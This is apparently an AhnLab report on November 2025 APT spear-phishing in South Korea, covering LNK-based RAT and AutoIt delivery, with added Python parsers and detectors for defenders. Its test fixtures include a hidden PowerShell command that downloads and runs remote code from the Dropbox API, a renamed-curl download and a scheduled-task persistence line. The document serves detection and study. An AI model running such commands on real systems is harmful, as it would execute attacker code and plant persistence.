November 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab monitors APT (Advanced Persistent Threat) attacks in South Korea using its own infrastructure. This report covers the classification and statistics of the APT attacks in South Korea identified during November 2025, and summarizes the features of each attack type.

Figure 1. Statistics of APT attacks in South Korea in November 2025
In Korea, most of the identified APT attacks were delivered by spear phishing. During the reporting period, attacks using JSE files increased compared with previous months and accounted for the largest share of all attack types.
APT Group Targets South Korea
The following are the cases and features of APT attacks in Korea identified in November 2025.
1) Spear Phishing
Spear phishing is a phishing attack aimed at specific individuals or groups. Unlike regular phishing, threat actors collect and analyze information about their targets during a reconnaissance phase before launching the attack, then use that information to craft the phishing email so that the recipient is more likely to trust it. In some cases, the sender address is spoofed as well. Most spear phishing emails carry a malicious attachment or link together with a pretext that prompts the recipient to open it.
The following are the types of malware distributed using this technique.
1.1 Attacks Using LNK
Type A
This type ends in the execution of RAT malware. The LNK files are mainly distributed inside a compressed archive together with legitimate files. The identified LNK files contain malicious PowerShell commands that use the Dropbox API or Google Drive to download additional scripts and an obfuscated RAT onto the user's PC. The RAT then carries out the threat actor's commands, including keylogging and screenshot capture. The identified RAT families are XenoRAT and RoKRAT.
The confirmed file names are as follows.

| File Name |
|---|
| October 2025 Translation Let's make the ceasefire bring judgment for Israel's crimes. |
| 2025-11-05_pha20250076959.lnk |
| North Korea-related Documents.lnk |

Table 1. Confirmed file names
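The Type A chain starts with a PowerShell command embedded in the LNK's StringData. The following is an added example, not code from the report or from AhnLab: a minimal MS-SHLLINK parser that walks the header, skips the LinkTargetIDList and LinkInfo blocks, and pulls out the RelativePath and CommandLineArguments strings, then flags the indicators this section describes (PowerShell launch, hidden window, cloud-storage download). The two LNK blobs it parses are constructed in the script itself; the Dropbox API path and bearer token are placeholders, not indicators from a real sample.

```python
"""Minimal .lnk (MS-SHLLINK) parser plus triage for the PowerShell-in-LNK pattern.

Added example. The fixtures below are constructed here, not real samples.
"""
import struct

# ShellLinkHeader constants (MS-SHLLINK section 2.1)
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # target window opened minimised/inactive; typical of malicious LNKs

# StringData entries appear in this fixed order, each only when its flag is set
STRING_DATA = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Cloud-storage hosts the report names as second-stage sources
CLOUD_HOSTS = ("dropboxapi.com", "dropbox.com", "googleapis.com",
               "drive.google.com", "docs.google.com")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a .lnk; IDList and LinkInfo are skipped."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        info[name] = data[off:off + nbytes].decode("utf-16-le" if unicode else "cp1252",
                                                   errors="replace")
        off += nbytes
    return info


def triage(info: dict) -> list:
    """Return human-readable indicators matching the Type A pattern (empty if none)."""
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if "powershell" in target or "pwsh" in target:
        findings.append("launches PowerShell")
    if any(t in target for t in ("-ep bypass", "executionpolicy bypass", "-w hidden", "windowstyle hidden")):
        findings.append("PowerShell policy/window evasion switches")
    if any(t in target for t in ("iex", "invoke-expression", "downloadstring", "invoke-restmethod")):
        findings.append("downloads and executes remote content")
    hosts = [h for h in CLOUD_HOSTS if h in target]
    if hosts:
        findings.append("cloud-storage second stage: " + ", ".join(hosts))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window set to SW_SHOWMINNOACTIVE (hidden from user)")
    if len(info.get("arguments", "")) > 260:
        findings.append("oversized argument string (%d chars)" % len(info["arguments"]))
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal .lnk with only RelativePath and Arguments (test fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20,          # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,       # creation / access / write FILETIME
                         0, 0,          # FileSize, IconIndex
                         show_command, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed fixtures modeled on the report's description (placeholder URL path/token).
MALICIOUS_LNK = build_lnk(
    r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-windowstyle hidden -ep bypass -c "
    "\"$u='https://content.dropboxapi.com/2/files/download';"
    "iex (Invoke-RestMethod -Method Post -Uri $u -Headers @{Authorization='Bearer <token>'})\"",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\..\..\..\Windows\System32\notepad.exe", r"C:\Users\user\notes.txt")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        parsed = parse_lnk(blob)
        print(label, parsed.get("relative_path"), triage(parsed))
```

Real samples usually also set HasLinkTargetIDList and pad the argument string with whitespace so the command is not visible in the Properties dialog, which is why the length check is included; the parser tolerates both because it skips the IDList by its declared size.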
Type B
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file runs, it connects to an external URL and downloads additional files. A distinguishing feature is that the legitimate curl.exe is first copied under a different file name (e.g., WpqNoXz.exe) and the renamed copy is executed to perform the download, which fetches a legitimate AutoIt interpreter together with a malicious AutoIt script. The downloaded files are then registered in the Task Scheduler so that they keep running. The malicious AutoIt script can execute commands, search directories, and upload and download files.
The confirmed file names are as follows.

| File Name |
|---|
| 1. Instructions for Submitting Bank Transaction History.hwp.lnk |
| **Consent to the Collection, Use, and Provision of Bank Personal (Credit) Information.pdf.lnk |
| ** Promotional Video Subtitle Script.docx.lnk |
| Statement of Origin of Undeclared Funds (Enforcement Decree of the Value-Added Tax Act).hwp.lnk |

Table 2. Confirmed file names
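The Type B chain leaves a recognisable trail in process-creation telemetry: a hidden PowerShell spawned by Explorer, a binary whose PE OriginalFileName is curl.exe but whose on-disk name is not, a schtasks /create pointing at a user-writable directory, and an AutoIt interpreter running a script from that directory. The following is an added example, not code from the report or from AhnLab: detection logic over constructed events modeled on Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage, ProcessId, ParentProcessId), which correlates the stages by walking each hit up to the root of its process tree. The events, PIDs and paths are made up here; the renamed-copy name WpqNoXz.exe is taken from the report, and the assumption that AutoIt3.exe carries OriginalFileName "AutoIt3.exe" is an assumption of this example. Time windows are ignored for brevity.

```python
"""Detect the LNK -> PowerShell -> renamed curl.exe -> AutoIt -> schtasks chain.

Added example over constructed Sysmon-style process-creation events.
"""
import ntpath
import re
from collections import defaultdict

# Directories a user-level dropper can write to (paths are lower-cased before matching)
USER_WRITABLE = re.compile(r"(\\appdata\\|\\programdata\\|\\temp\\|\\users\\public\\|\\downloads\\)", re.I)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def indicators(ev: dict) -> list:
    """Per-event indicators for the Type B pattern (empty list if none)."""
    hits = []
    image = basename(ev.get("Image", ""))
    orig = ev.get("OriginalFileName", "").lower()   # from the PE version resource
    cmd = ev.get("CommandLine", "")
    parent = basename(ev.get("ParentImage", ""))
    # curl.exe copied under another name: version info says curl.exe, disk name does not
    if orig == "curl.exe" and image != "curl.exe":
        hits.append("renamed curl.exe (%s)" % image)
    # Double-clicked LNK: Explorer starts PowerShell with a hidden window
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
            and re.search(r"(-w|-windowstyle)\s+hidden", cmd, re.I):
        hits.append("hidden PowerShell launched from Explorer")
    # Persistence: task action living in a user-writable directory
    if image == "schtasks.exe" and re.search(r"/create", cmd, re.I) and USER_WRITABLE.search(cmd):
        hits.append("scheduled task pointing at user-writable path")
    # AutoIt interpreter (assumed OriginalFileName AutoIt3.exe) running a dropped script
    if (orig == "autoit3.exe" or image.startswith("autoit3")) and USER_WRITABLE.search(cmd):
        hits.append("AutoIt interpreter running script from user-writable path")
    return hits


def correlate(events: list) -> dict:
    """Group indicators by the root process of the tree each hit belongs to."""
    by_pid = {ev["ProcessId"]: ev for ev in events}

    def root(pid):
        seen = set()
        while pid in by_pid and by_pid[pid]["ParentProcessId"] in by_pid and pid not in seen:
            seen.add(pid)
            pid = by_pid[pid]["ParentProcessId"]
        return pid

    chains = defaultdict(list)
    for ev in events:
        for hit in indicators(ev):
            chains[root(ev["ProcessId"])].append(hit)
    return dict(chains)


def alerts(events: list, min_stages: int = 2) -> dict:
    """Only trees showing at least min_stages distinct stages become alerts."""
    return {r: hits for r, hits in correlate(events).items() if len(set(hits)) >= min_stages}


def _ev(pid, ppid, image, orig, cmd, parent):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "OriginalFileName": orig, "CommandLine": cmd, "ParentImage": parent}


# Constructed telemetry: one malicious tree under explorer.exe plus an unrelated, legitimate curl run.
EVENTS = [
    _ev(1000, 500, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    _ev(1100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
        'powershell.exe -windowstyle hidden -ep bypass -c "<stage-1 command>"', r"C:\Windows\explorer.exe"),
    _ev(1200, 1100, r"C:\Users\user\AppData\Local\Temp\WpqNoXz.exe", "curl.exe",
        r"WpqNoXz.exe -s -o C:\Users\user\AppData\Roaming\svc\s.au3 https://example.invalid/s",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    _ev(1300, 1100, r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
        r'schtasks /create /tn "WindowsUpdate" /tr "C:\Users\user\AppData\Roaming\svc\AutoIt3.exe C:\Users\user\AppData\Roaming\svc\s.au3" /sc minute /mo 10',
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    _ev(1400, 1100, r"C:\Users\user\AppData\Roaming\svc\AutoIt3.exe", "AutoIt3.exe",
        r"C:\Users\user\AppData\Roaming\svc\AutoIt3.exe C:\Users\user\AppData\Roaming\svc\s.au3",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    _ev(2000, 2100, r"C:\Windows\System32\curl.exe", "curl.exe",
        "curl.exe -I https://example.invalid/", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for root_pid, hits in alerts(EVENTS).items():
        print("ALERT root pid %d:" % root_pid, *hits, sep="\n  ")
```

Requiring two distinct stages under one root keeps a lone renamed curl.exe (common in packaged software) from alerting on its own; the OriginalFileName check is the part that cannot be defeated by renaming, whereas a rule keyed on the image name alone misses every copy.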
The following decoy file is displayed after execution so that the user believes a legitimate document was opened.

Figure 2. Identified decoy file